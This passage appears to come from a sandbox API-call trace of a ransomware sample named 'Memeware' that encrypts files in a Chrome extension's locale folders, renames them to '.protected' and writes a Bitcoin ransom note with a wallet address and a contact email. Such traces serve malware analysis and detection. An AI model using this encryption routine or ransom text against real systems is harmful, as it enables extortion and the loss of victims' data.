(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.534] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.534] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.534] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.534] CloseHandle (hObject=0x164) returned 1 [0081.534] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0081.534] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0081.534] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr") returned 141 [0081.534] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0081.534] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0081.534] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*") returned 143 [0081.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.535] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.535] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.535] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.535] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.535] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.535] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\.") returned 143 [0081.535] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.535] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.535] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.535] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.535] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.535] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.535] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.535] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\..") returned 144 [0081.535] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.535] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.535] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.535] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.535] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.535] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0081.535] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.535] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.535] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0081.535] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0081.535] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json") returned 155 [0081.536] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.536] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x127, lpOverlapped=0x0) returned 1 [0081.536] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.536] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x127, lpOverlapped=0x0) returned 1 [0081.536] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.536] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.536] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.536] CloseHandle (hObject=0x168) returned 1 [0081.537] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.protected") returned 165 [0081.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.protected")) returned 1 [0081.537] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.537] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.537] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0081.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.537] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.537] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.538] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.538] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.538] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.538] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.539] CloseHandle (hObject=0x164) returned 1 [0081.539] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.539] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0081.539] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0081.539] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0081.539] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0081.539] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0081.539] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th") returned 141 [0081.539] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0081.539] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0081.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*") returned 143 [0081.539] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.539] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.539] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.539] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.539] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.539] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\.") returned 143 [0081.539] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.539] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.539] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.539] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.539] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.539] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.539] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\..") returned 144 [0081.539] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.539] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.539] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0081.539] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.540] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.540] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.540] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.540] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0081.540] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.540] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0081.540] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.540] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0081.540] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.540] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x144, lpOverlapped=0x0) returned 1 [0081.541] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffebc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.541] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x144, lpOverlapped=0x0) returned 1 [0081.541] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.541] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.541] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.541] CloseHandle (hObject=0x168) returned 1 [0081.541] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.protected") returned 165 [0081.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.protected")) returned 1 [0081.542] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.542] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.542] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0081.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.542] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.542] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.543] lstrlenA (lpString="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") returned 684 [0081.543] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.543] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.543] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | 